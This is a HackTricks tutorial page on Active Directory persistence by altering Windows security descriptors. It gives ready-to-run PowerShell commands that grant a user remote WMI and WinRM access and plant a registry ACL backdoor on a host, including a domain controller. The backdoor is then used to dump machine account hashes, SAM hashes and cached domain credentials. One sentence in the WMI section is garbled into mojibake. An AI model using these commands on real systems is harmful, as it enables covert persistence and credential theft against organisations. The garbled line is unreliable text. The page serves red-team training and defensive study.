Security Descriptors

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Security Descriptors

From the docs: Security Descriptor Definition Language (SDDL) defines the format used to describe a security descriptor. SDDL uses ACE strings for the DACL and SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

Security descriptors are used to store the permissions that principals hold over an object. If you can make even a small change to an object's security descriptor, you can obtain very interesting privileges over that object without needing to be a member of a privileged group.

This persistence technique is therefore based on obtaining every permission needed on specific objects, so that tasks which normally require administrator privileges can be performed without being an administrator.

Access to WMI

์‚ฌ์šฉ์ž์—๊ฒŒ ์›๊ฒฉ WMI ์‹คํ–‰์— ๋Œ€ํ•œ ์•ก์„ธ์Šค๋ฅผ ๋ถ€์—ฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค using this:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc โ€“namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcโ€“namespace 'root\cimv2' -Remove -Verbose #Remove

Access to WinRM

Grant a user access to the WinRM PowerShell console using this:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Remote access to hashes

Using DAMP, create a registry backdoor that grants access to the registry and lets you dump hashes, so that at any moment you can retrieve the machine account hash, the SAM and every cached AD credential of that computer. This is therefore very useful when the permission is granted to a regular user against a Domain Controller:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Check Silver Tickets to learn how the computer account hash of a Domain Controller can be used.
